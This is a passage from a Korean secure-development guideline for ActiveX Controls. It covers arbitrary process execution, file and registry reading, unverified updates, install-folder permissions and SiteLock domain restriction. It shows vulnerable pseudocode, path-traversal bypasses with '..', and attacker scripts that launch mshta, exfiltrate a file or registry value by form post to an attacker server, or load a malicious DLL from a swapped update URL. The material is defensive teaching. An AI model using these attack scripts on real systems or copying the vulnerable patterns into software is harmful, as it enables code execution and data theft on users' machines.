36 제4 장 안전한 ActiveX Control 개발을 위한 십계명 <object id= PokerLauncher classid= clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx > <param name= Server value= A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A A A A A A A A A A A A A A AA > </object> ActiveX Control 개발 보안가이드라인 [그림 9] 파라미터를 통한 버퍼오버플로우 취약점 악용 예 36 ActiveX Control 개발 보안가이드라인

37 제 2 절임의의프로세스를실행할수있는기능금지 제 2 절임의의프로세스를실행할수있는기능금지 1. 개요 임의의프로세스를실행할수있는기능이란 ActiveX Control이 HTML의 <param> 태그나스크립트상에서프라퍼티, 메소드인자를통하여사용자시스템에있는임의의실행파일에대한경로, 이름및실행인자를입력으로받고해당파일을실행하는기능을의미한다. 일반적으로임의의프로세스를실행하는기능은보안상매우위험하므로 ActiveX Control의메소드형태로구현하지말아야하지만, 보안을고려하지않는개발자들이쉽게범할수있는실수이고, 또한자주발견되고있는취약점이다. [ 그림 10] 은임의의프로세스를실행할수있는가장전형적인예를보여주는의사코드이다. MyActiveX라는이름을가진 ActiveX Control의 CreateProcessMethod 메소드는입력값인 x를실행파일의경로및이름으로하여해당실행파일을실행하도록되어있다. void MyActiveX::CreateProcessMethod(BSTR x) { CreateProcess(..., x,...); // Create Process } [ 그림 10] 임의의프로세스를실행할수있도록구현된메소드의예 실행할수있는프로세스를제한하지않고임의의파일을실행할수있도록설계되어있다면프로세스실행취약점이발생하게된다. 프로세스실행취약점이발생하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템을장악하고중요파일의변조나삭제등치명적인피해를줄수있다. 프로세스실행취약점을방지하기위해서는해당 ActiveX Control의실행에꼭필요한파일에대해서만프로세스실행기능을제공하도록프로그램을개발하여야한다. HTML 또는스크립트상에서실행파일의경로와이름또는실행인자를입력받지않도록프로그램소스상에고정하는방법이가장안전하다. 제 4 장안전한 ActiveX Control 개발을위한십계명 37

38 제 4 장 안전한 ActiveX Control 개발을위한십계명 불가피하게 HTML 또는스크립트상의입력값을통한프로세스실행기능이필요하다면, 입력값을개인키로암호화하여변조될수없게보호하거나, 경로나이름으로필터링하여기능을제한하여야한다. 필터링을구현할때는실행파일의경로가.. 으로제한된범위를벗어나지않도록구현에주의가필요하다. 또한, 실행인자를입력받는경우에는실행인자에대한크기를검증하고특수문자를사용한경우지정된범위를벗어나지않도록구현에주의가필요하다. 2. 검증항목 임의의프로세스를실행할수있는기능 (HTML의 <param> 태그나스크립트상에서메소드 / 프라퍼티를통하여사용자시스템에있는임의의실행파일에대한경로와이름, 실행인자를입력받아해당파일을실행하는기능 ) 을제공하지말아야한다. 제한된경로내의실행파일에대하여프로세스를실행할수있는기능 (HTML의 <param> 태그나스크립트상에서메소드 / 프라퍼티를통하여실행파일에대한경로와이름, 실행인자를입력받아해당파일을실행하는기능 ) 을제공하는경우에는입력값에.. 을사용할수없도록제한하여야한다. 3. 검증항목간과시위험성 HTML 또는스크립트상의입력값을통하여임의의프로세스를실행할수있는기능은곧프로세스실행취약점이다. ActiveX Control에프로세스실행취약점이존재하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템을장악하고중요파일의변조나삭제등치명적인피해를줄수있다. 또한, 제한된경로내의실행파일에대하여프로세스실행기능을구현하였는데우회가가능하다면이역시임의의실행파일에대한실행이가능하여프로세스실행취약점을가지므로위험하다. 프로세스실행취약점은윈도우비스타의강화된보안정책인사용자계정컨트롤및보호모드에제약되지만임의로악성코드를설치하거나실행할수있기때문에주의가필요하다. 38

39 제 2 절임의의프로세스를실행할수있는기능금지 4. 사례 가. 프로세스실행취약점사례 [ 그림 11] 은 [ 그림 10] 에서구현된 MyActiveX의 CreateProcessMethod 메소드가악의적인공격자에의해악용되는예이다. [ 그림 11] 과같은악의적인공격자의스크립트가웹게시물이나이메일을통해사용자시스템에서실행되면, 취약점을가진 CreateProcessMethod가사용자몰래호출되어 mshta.exe가실행되고공격자서버에서악성코드인 exploit.hta를다운받아실행하게된다. 즉, 임의의프로세스실행기능을통해사용자시스템에악성코드가설치되고실행되는것이다. <object id=myactivex classid= clsid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} > </object> <script> MyActiveX.CreateProcessMethod( mshta.exe ); </script> [ 그림 11] 임의의프로세스실행기능악용예 CreateProcessMethod가안전하게구현되려면, CreateProcessMethod에의해실행되는실행파일의경로및이름이제한되도록프로그램을변경하여야한다. 가장좋은방법은실행파일의경로및이름을메소드인자로입력받지않고, 프로그램소스상에서고정하여사용하는것이다. 하지만, 이방법이어렵다면입력값을개인키로암호화하여변조될수없게보호하거나, 특정폴더를지정하여이폴더의하위파일에대해서만프로세스실행기능이가능하도록입력값에대한필터링을구현하여야한다. 필터링을구현할때는실행파일의경로가우회되지않도록.. 을사용할수없도록제한하여야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 39

40 제 4 장 안전한 ActiveX Control 개발을위한십계명 제 3 절임의의파일내용에대한읽기기능금지 1. 개요 임의의파일내용에대한읽기기능이란 ActiveX Control이 HTML의 <param> 태그나스크립트상에서메소드인자, 프라퍼티를통하여사용자시스템에있는임의의파일에대한경로와이름을입력받고해당파일의내용을메소드의리턴값이나프라퍼티로출력하는기능을의미한다. 임의의파일내용에대한읽기기능은범용으로사용될수있다는장점때문에 ActiveX Control 개발자들이일반적으로구현하게되는대표적인취약점유형중하나이다. [ 그림 12] 는임의의파일내용에대하여읽기기능을구현한가장전형적인예를보여주는의사코드이다. MyActiveX라는이름을가진 ActiveX Control의 ReadFileMethod라는이름의메소드가파일경로와이름을입력값 x로받아해당파일을읽어들이고파일내용을 Base64 인코딩하여리턴하도록구현되어있다. 파일의내용을읽어서출력하는기능이제한되어있지않고임의의파일을읽을수있게설계되어있다면파일읽기취약점이발생하게된다. 파일읽기취약점이발생하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템의중요파일의내용을유출시킬수있다. 파일읽기취약점을방지하기위해서는해당 ActiveX Control의실행에꼭필요한파일에대해서만파일읽기기능을제공하도록프로그램을작성하여야한다. HTML 또는스크립트상에서파일경로및이름을입력받지않도록프로그램소스상에파일경로및이름을고정하는방법이가장안전하다. 불가피하게 HTML 또는스크립트상의입력값을통한파일읽기기능이필요하다면, 입력값을개인키로암호화하여변조될수없게보호하거나, 폴더이름, 파일이름, 확장자등으로필터링기능을제한하여야한다. 필터링을구현할때는파일의경로가.. 으로우회되지않도록구현에주의가필요하다. 40

41 제 3 절임의의파일내용에대한읽기기능금지 BSTR MyActiveX::ReadFileMethod(BSTR x) { HANDLE hfile; BSTR content, encodedcontent; hfile= CreateFile(x,...); ReadFile(hFile, &content,...); Base64Encode(&content, &encodedcontent); return encodedcontent; } // Open file // Read file content // Encode file content // Return encoded file content [ 그림 12] 임의의파일읽기기능을구현한메소드의예 2. 검증항목임의의파일내용에대한읽기기능 (HTML의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여사용자시스템에있는임의의파일에대한경로와이름을입력받고해당파일의내용을메소드의리턴값이나프라퍼티로출력하는기능 ) 을제공하지말아야한다. 제한된폴더내의파일에대하여읽기기능 (HTML의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여파일에대한경로와이름을입력받고해당파일의내용을메소드의리턴값이나프라퍼티로출력하는기능 ) 을제공하는경우에는입력값에.. 을사용할수없도록제한하여야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 3. 검증항목간과시위험성 HTML 또는스크립트상의입력값을통한임의의파일내용에대한읽기기능은곧파일읽기취약점이다. ActiveX Control에파일읽기취약점이존재하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템의중요파일의내용을외부로유출시킬수있다. 또한, 제한된폴더내의파일에대하여파일내용에대한읽기기능을구현하였는데우회가가능하다면이역시임의의파일내용에대한읽기기능이가능하여파일읽기취약점을가지므로위험하다. 41

42 제 4 장 안전한 ActiveX Control 개발을위한십계명 파일읽기취약점은윈도우비스타의강화된보안정책인사용자계정컨트롤및보호모드기능으로도해결되지않기때문에더욱주의가필요하다. 4. 사례 가. 메소드를통해임의의파일읽기기능을제공하여악용되는예 [ 그림 13] 은 [ 그림 12] 에서구현된 MyActiveX의 ReadFileMethod 메소드가공격자에의해악용되는예이다. [ 그림 13] 과같은공격자의스크립트가웹게시물또는이메일열람을통해사용자시스템에서실행되면, 취약점을가진 ReadFileMethod가사용자몰래호출되어 C:\Program Files\SecretFile.hwp ( 임의로정한가상의중요파일 ) 에대한파일내용을변수 str에저장하여공격자웹서버의 exploit.asp에전달한다. 즉, 임의의파일읽기기능을통해사용자시스템의 C:\Program Files\SecretFile.hwp 파일이공격자에게유출되는것이다. ReadFileMethod가안전하게구현되려면, ReadFileMethod에의해읽기파일경로와이름이제한되도록프로그램을제작하여야한다. 가장좋은방법은파일경로와이름을메소드인자로입력받지않고, 프로그램소스상에서고정하여사용하는것이다. 하지만, 이방법이어렵다면입력값을개인키로암호화하여변조될수없게보호하거나, 특정폴더를정하여이폴더의하위파일에대해서만파일읽기기능이가능하도록입력값에대한필터링을구현하여야한다. 또한필터링을구현할때는파일의경로가우회되지않도록.. 을사용할수없도록제한하여야한다. <object id=myactivex classid= clsid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} > </object> <script> var str = MyActiveX.ReadFileMethod( C:/Program Files/SecretFile.hwp ); document.write( <form name= save method= post action= > ); document.write( <input type= hidden name= filecontent value= + str + > ); save.submit(); </script> [ 그림 13] 임의의파일읽기기능악용예 42

43 제 3 절임의의파일내용에대한읽기기능금지 나. 잘못구현된필터링으로임의의파일읽기기능을제공하는예 [ 그림 14] 는잘못구현된필터링의예이다. C:\Program Files\MyActiveX\ 폴더하위의파일에대해서만읽기기능이가능하도록필터링을구현하였다. BSTR MyActiveX::ReadFileMethod2(BSTR filename) { BSTR x = C:/Program Files/MyActiveX/ + filename; return ReadFileMethod(x); } 그러나구현된필터링방식은 ReadFileMethod2(../SecretFile.hwp ) 와같은방법으로우회가가능하다. 따라서필터링을구현할때는파일의경로가우회되지않도록.. 을사용할수없도록제한하여야한다. [ 그림 15] 는 [ 그림 14] 를올바르게수정한예이다. BSTR MyActiveX::ReadFileMethod3(BSTR filename) { if(strstr(filename,.. )!= NULL) { /*...Here comes Error Handling Code... */ return ; } [ 그림 14] 잘못구현된파일읽기필터링의예 제 4 장안전한 ActiveX Control 개발을위한십계명 BSTR x = C:/Program Files/MyActiveX/ + filename; return ReadFileMethod(x); } [ 그림 15] 올바르게구현된파일읽기필터링의예 43

44 제 4 장 안전한 ActiveX Control 개발을위한십계명 제 4 절임의의레지스트리내용읽기기능금지 1. 개요 임의의레지스트리내용읽기기능이란 ActiveX Control이 HTML의 <param> 태그나스크립트상에서메소드인자, 프라퍼티를통하여사용자시스템에있는임의의레지스트리에대한경로및이름을입력받고해당레지스트리의내용을메소드의리턴값이나프라퍼티로출력하는기능을의미한다. 임의의레지스트리내용에대한읽기기능은범용으로사용될수있다는장점때문에 ActiveX Control 개발자들이일반적으로구현하게되는또하나의대표적인보안취약점유형중하나이다. [ 그림 16] 은임의의레지스트리읽기기능을구현한가장전형적인예를보여주는의사코드이다. MyActiveX라는이름을가진 ActiveX Control의 ReadRegistryMethod라는이름의메소드가입력값인 x를레지스트리키의경로및이름으로하여해당레지스트리키를읽어들이고입력값인 y의이름에해당하는레지스트리데이터의내용을 Base64 인코딩하여리턴하도록구현되어있다. 레지스트리의내용을읽어서출력하는기능이제한되어있지않고임의의레지스트리내용을읽을수있게설계되어있다면레지스트리읽기취약점이발생하게된다. 레지스트리읽기취약점이발생하면, 공격자는취약한해당 ActiveX Control을악용하여사용자시스템의중요레지스트리의내용을외부로유출시킬수있다. 레지스트리읽기취약점을방지하기위해서는해당 ActiveX Control의실행에꼭필요한레지스트리에대해서만레지스트리읽기기능을제공하도록프로그램을수정하여야한다. HTML 또는스크립트상에서레지스트리경로및이름을입력받지않도록프로그램소스상에레지스트리경로및이름을고정하는방법이가장안전하다. 불가피하게 HTML 또는스크립트상의입력값을통한레지스트리읽기기능이필요하다면, 입력값을개인키로암호화하여변조될수없게보호하거나, 경로나이름으로필터링을가하여기능을제한하여야한다. 필터링을구현할때는레지스트리의경로가.. 으로우회되지않도록구현에주의가필요하다. 44

45 제 4 절임의의레지스트리내용읽기기능금지 BSTR MyActiveX::ReadRegistryMethod(BSTR x, BSTR y) { HKEY hkey; BSTR content, encodedcontent; RegOpenKeyEx(HKEY_LOCAL_MACHINE, x,..., &hkey); // Open registry key x RegQueryValueEx(hKey, y,..., &content,...); Base64Encode(&content, &encodedcontent); return encodedcontent; } // Read data y of registry key x // Encode registry content // Return encoded registry content [ 그림 16] 임의의레지스트리내용읽기기능을구현한메소드의예 2. 검증항목임의의레지스트리내용에대한읽기기능 (HTML의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여사용자시스템에있는임의의레지스트리에대한경로와이름을입력받고해당레지스트리의내용을메소드의리턴값이나프라퍼티로출력하는기능 ) 을제공하지말아야한다. 제한된경로내의레지스트리에대하여읽기기능 (HTML의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여레지스트리에대한경로와이름을입력받고해당레지스트리의내용을메소드의리턴값이나프라퍼티로출력하는기능 ) 을제공하는경우에는입력값에.. 을사용할수없도록제한하여야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 3. 검증항목간과시위험성 HTML 또는스크립트상의입력값을통한임의의레지스트리읽기기능은곧레지스트리읽기취약점이다. ActiveX Control에레지스트리읽기취약점이존재하면, 악의적인공격자는취약한해당 ActiveX Control을악용하여사용자시스템의중요레지스트리의내용을외부로유출시킬수있다. 또한, 제한된경로내의레지스트리에대하여레지스트 45

46 제 4 장 안전한 ActiveX Control 개발을위한십계명 리읽기기능을구현하였는데우회가가능하다면이역시임의의레지스트리에대한읽기기능이가능하여레지스트리읽기취약점을가지므로위험하다. 레지스트리읽기취약점은윈도우비스타의강화된보안정책인사용자계정컨트롤및보호모드에도제약되지않기때문에더욱주의가필요하다. 4. 사례 가. 메소드를통해임의의레지스트리읽기기능을제공하여악용되는예 [ 그림 17] 은 [ 그림 16] 에서구현된 MyActiveX의 ReadRegistryMethod 메소드가공격자에의해악용되는예이다. <object id=myactivex classid= clsid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} > </object> <script> var str = MyActiveX.ReadRegistryMethod( SOFTWARE, SECRET ); document.write( <form name= save method= post action= > ); document.write( <input type= hidden name= filecontent value= + str + > ); save.submit(); </script> [ 그림 17] 임의의레지스트리읽기기능악용예 [ 그림 17] 과같은공격자의스크립트가웹게시물이나이메일열람을통해사용자시스템에서실행되면, 취약점을가진 ReadRegistryMethod가사용자몰래호출되어 HKLM\SOFTWARE 의 SECRET ( 임의로정한가상의중요레지스트리데이터 ) 이라는이름을가진데이터내용을변수 str에저장하여공격자의웹서버의 exploit.asp로전달한다. 즉, 임의의레지스트리읽기기능을통해사용자시스템의 HKLM\SOFTWARE 레지스트리키의 SECRET 데이터가공격자에게유출되는것이다. ReadRegistryMethod가안전하게구현되려면, ReadRegistryMethod에의해읽어지는레지스트리경로와이름이제한되도록프로그램을변경하여야한다. 가장좋은방법은레지스트리경로와이름을메소드인자로입력받지않고, 프로그램소스상에서고정하여사용하는것이다. 46

47 제 4 절임의의레지스트리내용읽기기능금지 하지만, 이방법이어렵다면입력값을개인키로암호화하여변조될수없게보호하거나, 특정레지스트리경로를지정하여이경로의하위레지스트리에대해서만읽기기능이가능하도록입력값에대한필터링을구현하여야한다. 필터링을구현할때는레지스트리의경로가우회되지않도록.. 을사용할수없도록제한하여야한다. 나. 잘못구현된필터링으로임의의레지스트리읽기기능을제공하는예 [ 그림 18] 은잘못된필터링의예이다. HKLM\SOFTWARE\MyActiveX 경로하위의레지스트리에대해서만읽기기능이가능하도록필터링을구현하였다. BSTR MyActiveX::ReadRegistryMethod2(BSTR keyname, BSTR valuename) { BSTR x = SOFTWARE\\MyActiveX\\ + keyname; return ReadRegistryMethod(x, valuename); } [ 그림 18] 잘못구현된레지스트리읽기필터링의예 하지만, 이필터링은 ReadRegistryMethod2(..\\, SECRET ) 과같은방법으로우회가가능하다. 따라서필터링을구현할때는레지스트리의경로가우회되지않도록.. 을사용할수없도록제한하여야한다. [ 그림 19] 는 [ 그림 18] 을올바르게수정한예이다. 제 4 장안전한 ActiveX Control 개발을위한십계명 47

48 제 4 장 안전한 ActiveX Control 개발을위한십계명 BSTR MyActiveX::ReadRegistryMethod3(BSTR keyname, BSTR valuename) { if(strstr(keyname,.. )!= NULL) { /*...Here comes Error Handling Code... */ } return ; if(strstr(valuename,.. )!= NULL) { /*...Here comes Error Handling Code... */ return ; } BSTR x = SOFTWARE\\MyActiveX\\ + keyname; return ReadRegistryMethod(x, valuename); } [ 그림 19] 올바르게구현된레지스트리읽기필터링의예 48

49 제 5 절업데이트파일에대한신뢰성검증 제 5 절업데이트파일에대한신뢰성검증 1. 개요 최근 ActiveX Control들은대부분자동업데이트기능을포함하고있으며, 이러한업데이트기능은 HTML의 <param> 태그나스크립트상에서메소드인자, 프라퍼티를통하여업데이트서버의 URL이나설치파일등의업데이트정보를입력받아서동작하는것이일반적이다. 만약업데이트정보 ( 업데이트서버의 URL, 설치파일, 업데이트되는파일등 ) 를공격자가변조할수있다면, 정상적인업데이트기능을악용하여악성코드를설치하는것이가능하다. ActiveX Control 프로그램의업데이트를공격자로부터보호하기위해서는업데이트파일에대한신뢰성검증이필요하며, 이를위한방법으로는서명값을검증하는방법이가장바람직하다. 서명값검증이란해당 ActiveX Control 개발업체에서공개키 / 개인키쌍을발급받고, 업데이트파일에대해서는개인키로서명한값을추가하여전달하고, 사용자시스템인클라이언트측에서는전달된업데이트파일에대하여서명값이올바른지공개키로검증하는방법을의미한다. 즉, 업데이트파일에디지털서명을하여업데이트파일에대한신뢰성을보장받는것이다. 서명값검증방법을구현하기어려운경우에는업데이트 URL을 HTML이나스크립트상에서입력받지아니하고프로그램소스상에서고정하여사용하는방법이한가지대안이될수있다. 제 4 장안전한 ActiveX Control 개발을위한십계명 2. 검증항목 업데이트 URL을 HTML의 <param> 태그나스크립트상에서메소드인자, 프라퍼티를통하여입력받는경우에는, 인터넷에서다운로드받는업데이트파일에대하여디지털서명을검증하여신뢰성을확보하여야한다. 49

50 제 4 장 안전한 ActiveX Control 개발을위한십계명 3. 검증항목간과시위험성 업데이트파일에대한신뢰성을확보할수없다면업데이트파일을통한 ActiveX Control 프로그램의변조가가능하다. 예를들면, 업데이트파일에대한 URL을메소드인자를통해설정할수있는경우에는공격자가업데이트 URL을공격자의서버내파일주소로변조하여임의의파일을사용자시스템에설치할수있게된다. ActiveX Control 프로그램이공격자에의해변조가가능하다면악성코드로바꿔치기당하거나실행코드내에악성코드가삽입될수있으며, 이후해당웹사이트를방문할때마다악성코드가실행되어사용자시스템에치명적인위협이될것이다. 4. 사례가. 메소드를통해서업데이트 URL을입력받는사례 [ 그림 20] 은정상으로사용되는업데이트기능을보여주는예이다. Download 메소드를통하여업체의웹서버로부터 module.zip을다운로드받고, C:\Program Files\MyActiveX\ 에압축을풀고, Run 메소드를통하여압축이풀린 module.dll 파일을로드하도록구현되어있다. [ 그림 20] 의 ActiveX Control은전형적인업데이트기능의보안취약점을가지고있다. <object id= MyActiveX classid= clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx > </object> <script> var UpdateURL = ; MyActiveX.Download(UpdateURL); /* Download and Extract into C:\Program Files\MyActiveX\ module.zip contains module.dll */ MyActiveX.Run(); // call LoadLibrary(C:\Program Files\MyActiveX\module.dll) </script> [ 그림 20] 정상적인 DLL 업데이트예 50

51 제 5 절업데이트파일에대한신뢰성검증 [ 그림 21] 은 [ 그림 20] 의 ActiveX Control이악용되는예이다. Download 메소드를통하여공격자의웹서버로부터 module.zip을다운로드받고, C:\Program Files\MyActiveX\ 에압축을풀고, Run 메소드를통하여압축이풀린 module.dll 파일을로드하도록구현되어있다. 단지여기서의 module.zip은정상적인 module.dll 파일을가지고있는업데이트파일이아니고, 악성코드가실행되는 module.dll 파일을가지고있기때문에, 사용자시스템은곧악성코드에감염되게된다. 이러한업데이트기능의보안취약점을이용한공격자의변조공격으로부터 ActiveX Control을보호하기위해서는업데이트파일에대한서명값검증을하거나, 업데이트 URL을 HTML이나스크립트상에서입력받지아니하고프로그램소스상에서고정하여사용하도록프로그램을수정하여야한다. <object id= MyActiveX classid= clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx > </object> <script> MyActiveX.Download( /* Download and Extract into C:\Program Files\MyActiveX\ module.zip contains module.dll that has malicious code */ MyActiveX.Run(); // call LoadLibrary(C:\Program Files\MyActiveX\module.dll) </script> 제 4 장안전한 ActiveX Control 개발을위한십계명 [ 그림 21] 악용되어 DLL 이변조되는예 51

52 제 4 장 안전한 ActiveX Control 개발을위한십계명 제 6 절관리자권한의폴더에 ActiveX Control 프로그램설치 1. 개요 ActiveX Control은설치된웹사이트에서실행될뿐만아니라웹게시물이나이메일의열람을통해서도손쉽게실행이가능하다. 또한, ActiveX Control을개발하는목적은인터넷익스플로러가접근하지못하는사용자시스템의자원을다루기위해서가대부분이다. 만약이러한 ActiveX Control이공격자에의해변조되어악성코드로변해있다면사용자시스템에치명적인위협이될것이자명하다. 불행히도일부 ActiveX Control 개발자들은이러한위협에대하여고려하지않은채업데이트나사용상의편의를위해인터넷익스플로러에서도접근이가능한낮은권한의폴더에프로그램을설치하기도한다. 하지만, 낮은권한의폴더에있는파일은쉽게수정이가능하기때문에잠재적으로변조될위험성이크다할수있다. ActiveX Control 프로그램을공격자의변조공격으로부터보호하기위해서는 ActiveX Control 프로그램을관리자권한의폴더에설치하는것이중요하다. 이때 ActiveX Control 프로그램이란실행코드인 exe, dll, ocx 등의파일을의미하고, 관리자권한의폴더란 C:\Windows\ 의하위폴더또는 C:\Program Files\ 의하위폴더를의미한다. 2. 검증항목 ActiveX Control 프로그램 (exe, dll, ocx등의파일 ) 은관리자권한의폴더 (C:\Windows\ 의하위폴더또는 C:\Program Files\ 의하위폴더 ) 에설치되어야한다. 3. 검증항목간과시위험성 관리자권한의폴더에설치되지않는 ActiveX Control 프로그램은낮은권한을가진프로세스에의해서도변조가가능하기때문에보안상문제가있다. 예를들자면, 편의를위 52

53 제 6 절관리자권한의폴더에 ActiveX Control 프로그램설치 해인터넷익스플로러가쓰기접근이가능한폴더에 ActiveX Control의프로그램파일을설치한다면, 해당 ActiveX Control의보안취약점에의해서프로그램이변조될수있을뿐만아니라해당 ActiveX Control에보안취약점이존재하지않는다고해도잠재적으로다른 ActiveX Control의보안취약점을통해서변조가가능한위험성을가진다. ActiveX Control 프로그램이악의적인공격자에의해변조가가능하다면악성코드로바꿔치기당하거나실행코드내에악성코드가삽입될수있으며, 이후해당웹사이트를방문할때마다악성코드가실행되어사용자시스템에치명적인위협이될것이다. 4. 사례가. DLL 파일이낮은권한에서쓰기접근이가능한폴더에위치하는예 [ 그림 22] 는 ActiveX Control의실행을위한일부 DLL 파일이낮은권한에서쓰기접근이가능한폴더하위에설치되어있는모습을보여준다. 예에서 ActiveX Control은업데이트 URL을입력받아해당 URL의 xxx.dll.zip 파일을 C:\Users\( 사용자계정 )\AppData\LocalLow\ XXX\XXX 폴더에다운로드하고압축을자동으로풀어 xxx.dll 파일을덮어쓸수있는파라미터를제공하고있다. 해당폴더는인터넷익스플로러의낮은권한으로도쓰기접근이가능하기때문에공격자가 ActiveX Control이나또는다른인터넷익스플로러의취약점을이용하여 DLL 파일을덮어씀으로써프로그램을변조할수있는위험을가진다. 변조된 DLL 파일은해당 ActiveX Control이실행될때마다메모리에로드되어자동으로실행된다. 즉, 공격자가해당 DLL 파일을악성코드로덮어쓴다면이후해당웹사이트를방문할때마다악성코드가실행되어사용자시스템에치명적인위협이될것이다. 이와같은위험으로부터 ActiveX Control 프로그램을보호하기위해서는 ActiveX Control 프로그램을관리자권한의폴더에설치하여야만한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 53

54 제 4 장 안전한 ActiveX Control 개발을위한십계명 [ 그림 22] DLL 파일이낮은권한의폴더에설치되어있는예 54

55 제 7 절실행가능한웹사이트의제한 제 7 절실행가능한웹사이트의제한 1. 개요 대부분의 ActiveX Control은설치된웹사이트에서만필요하며그외의웹사이트에서는실행될필요가없다. 하지만, ActiveX Control은설치된웹사이트에서뿐만아니라다른모든웹사이트나이메일을통해서도손쉽게실행이가능하다. 문제는특정 ActiveX Control이보안취약점을가지는경우해당 ActiveX Control을설치하고사용했던웹사이트뿐만이아니라모든웹사이트와이메일을통해서도공격이가능해진다는점이다. 따라서 ActiveX Control의악용을방지하기위해서는 ActiveX Control의실행가능한웹사이트를제한하여야만한다. 실행가능한웹사이트의제한은 ActiveX Control의보안취약점을제거해줄수는없지만, 공격자의공격을효과적으로방어해줄수있다. 왜냐하면 ActiveX Control의악용은해당 ActiveX Control이설치되고사용되는사이트와는관계가없는공격자의웹서버또는이메일을통해서대부분이루어지기때문이다. ActiveX Control의실행가능한웹사이트를제한하기위해서는 ActiveX Control이실행되는시점에웹사이트 URL에대한필터링을구현하여야하며, 이를위해 SiteLock Template을활용할것을적극권장한다. SiteLock Template이란 ActiveX Control가실행되는도메인을제한해주기위해 Microsoft 에서제공하는 ATL 템플릿으로써실행가능한웹사이트리스트의제한뿐만아니라, 추가적으로실행가능한인터넷영역의제한및실행가능한유효기간설정등의기능을제공해준다. SiteLock Template을활용하지않고직접웹사이트 URL에대한필터링 11) 을구현할수있겠으나사용이간편하고안정적이며 URL이우회될수있는실수를방지해주기때문에 SiteLock Template을이용하는편이바람직하다. SiteLock Template을설치할수있는 URL 은아래와같다 ( 또는 MSDN 사이트에서 SiteLock Template을검색하면찾을수있다 ). 제 4 장안전한 ActiveX Control 개발을위한십계명 11) 이올바른도메인이라면 com%2fmyweb.com, 등과같은방법으로우회되지않아야한다. 55

56 제 4 장 안전한 ActiveX Control 개발을위한십계명 SiteLock Template 설치 URL : 2. 검증항목 Microsoft의 SiteLock Template를활용하여특정웹사이트에서만 ActiveX Control 이실행가능하도록제한하여야한다. 3. 검증항목간과시위험성 실행가능한웹사이트가제한되지않은 ActiveX Control은보안취약점이발견될경우, 해당 ActiveX Control이설치되고사용되었던웹사이트뿐만아니라다른웹사이트방문이나이메일열람을통해서도악용이가능하다. 즉, 악의적인공격자에의해인터넷어디에서라도공격이가능해진다. 실행가능한웹사이트의제한은 ActiveX Control의보안취약점을제거해줄수는없지만, 공격자의공격루트를차단함으로써공격을방어해주는효과를가진다. 덧붙여실행가능한웹사이트로지정된웹사이트에서의 ActiveX Control의악용을방어하기위해서는해당웹사이트에서스크립트인젝션취약점이나 XSS 취약점이발생하지않도록하여야만한다. 4. 사례 가. VC++ 로개발된 ActiveX Control에 SiteLock Template 을적용한예 VC++ 로개발된 ActiveX Control에 SiteLock Template을적용하여 myweb.com 도메인으로실행가능한웹사이트를제한하는예를기술한다. 상세한내용은 SiteLock 설치시첨부된 sitelock.doc와 sitelock.h 파일을참고한다. 56

57 제 7 절실행가능한웹사이트의제한 ActiveX Control 에 SiteLock Template 적용순서 1) SiteLock을설치 URL로부터다운로드받는다. 2) C:\Program Files\Microsoft\SiteLock 1.14\sitelock.h 파일을복사하여 ActiveX Control 프로젝트에추가한다. 3) StdAfx.h 파일에 [ 그림 23] 과같은내용을추가한다. #define SITELOCK_USE_MAP #define SITELOCK_NO_EXPIRY #define SITELOCK_USE_IOLEOBJECT #include sitelock.h // use macro for sitelock // do not use expire-time // use IOleObject [ 그림 23] SiteLock Template 적용 (1) 4) ActiveX Control 클래스에 [ 그림 24] 와같이 CSiteLock 을 base 클래스에추가한다. class CMyActiveXCtrl :...,..., public CSiteLock<CMyActiveXCtrl> // for SiteLock [ 그림 24] SiteLock Template 적용 (2) 제 4 장안전한 ActiveX Control 개발을위한십계명 5) 멤버를선언하는곳에 [ 그림 25] 와같은내용을추가한다. 예에서는 myweb.com 도메인에대한 http 접속을허용하겠다는의미이다. BEGIN_SITELOCK_MAP() SITELOCK_ALLOWHTTP END_SITELOCK_MAP() ( L myweb.com ) // allow *.myweb.com [ 그림 25] SiteLock Template 적용 (3) 6) 웹사이트제한을위해 CSiteLock::InApprovedDomain() 함수를적용한다. CSiteLock::InApprovedDomain() 함수는올바른도메인에서는 true를, 올바르지않은도메인에서는 false를반환한다. Safe for Initialization 과 Safe for Scripting을 IObjectSafety 57

58 제 4 장 안전한 ActiveX Control 개발을위한십계명 인터페이스를통해구현하였다면, CSiteLock::InApprovedDomain() 을구현부에적용하여 ActiveX Control이처음시작될때웹사이트를제한하는것이바람직하다. ActiveX Control 에 SiteLock Template 적용시고려할점 1) GetSite : is not a member of CMyActiveXCtrl 과같은에러메시지발생시에는 sitelock.h 파일의 GetOurUrl 함수의구현부를 [ 그림 26] 과같이수정한다. // Get the client site, container, and provider, etc. // hr = IObjectWithSite::GetSite(IID_IOleClientSite, (void**)&spclientsite); // if (FAILED(hr)) // return false; [ 그림 26] SiteLock Template 적용 (4) 2) COleControl::GetClientSite : function does not take 1 arguments 와같은에러메시지발생시에는 sitelock.h 파일의 GetOurUrl 함수의구현부를 [ 그림 27] 과같이수정한다. #ifdef SITELOCK_USE_IOLEOBJECT // hr = pt->getclientsite((ioleclientsite **)&spclientsite); // if (FAILED(hr) spclientsite == NULL) // return false spclientsite = pt->getclientsite(); if (spclientsite == NULL) return false hr = spclientsite->queryinterface(iid_iserviceprovider, (void **)&spsrvprov); #else hr = pt->getsite(iid_iserviceprovider, (void**)&spsrvprov); #endif [ 